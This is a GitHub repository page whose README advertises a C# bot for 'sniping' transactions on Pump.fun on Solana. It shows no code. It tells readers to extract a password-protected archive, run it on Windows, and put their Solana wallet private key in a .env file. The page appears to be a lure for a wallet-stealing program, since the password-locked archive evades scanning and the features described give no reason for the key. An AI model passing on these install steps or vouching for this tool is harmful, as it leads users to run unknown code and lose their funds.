Skip to content

A specialized bot built with C# and the Solnet library, designed to target and execute transaction sniping on Pump.fun within the Solana blockchain ecosystem.

Notifications You must be signed in to change notification settings

serazess/pump.fun

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

overview

A bot for sniping transactions in Pump.fun on the Solana blockchain using C# and the Solnet library.

Features

  • Connects to the Solana MainNet.
  • Creates and sends transactions to a specified target account.
  • Configurable via environment variables.

Installation

  • Clone the repository
  • extract archive with pass Oi1ibQ
  • create a .env file in the project's root directory and define your environment variables. You can use the provided .env.example
  • run the bot.

Configuration

The bot uses environment variables for configuration. Create a .env file in the root directory and set the following variables:

  • SOLANA_PRIVATE_KEY: Your Solana wallet's private key.
  • TARGET_PUBLIC_KEY: The public key of the target account.
  • TRANSFER_AMOUNT: The amount to transfer in lamports (1 SOL = 1_000_000_000 lamports).

Example .env file:

SOLANA_PRIVATE_KEY=your-private-key-here
TARGET_PUBLIC_KEY=target-public-key-here
TRANSFER_AMOUNT=1000000

Prerequisites

  1. Framework 4.0 and more:

  2. Windows 10/11.

  3. Solnet Libraries: The project uses the Solnet library to interact with the Solana blockchain.

  4. .NET SDK: Ensure you have the .NET SDK installed. You can download it from the .NET official site.

About

A specialized bot built with C# and the Solnet library, designed to target and execute transaction sniping on Pump.fun within the Solana blockchain ecosystem.

Topics

Resources

Stars

Watchers

Forks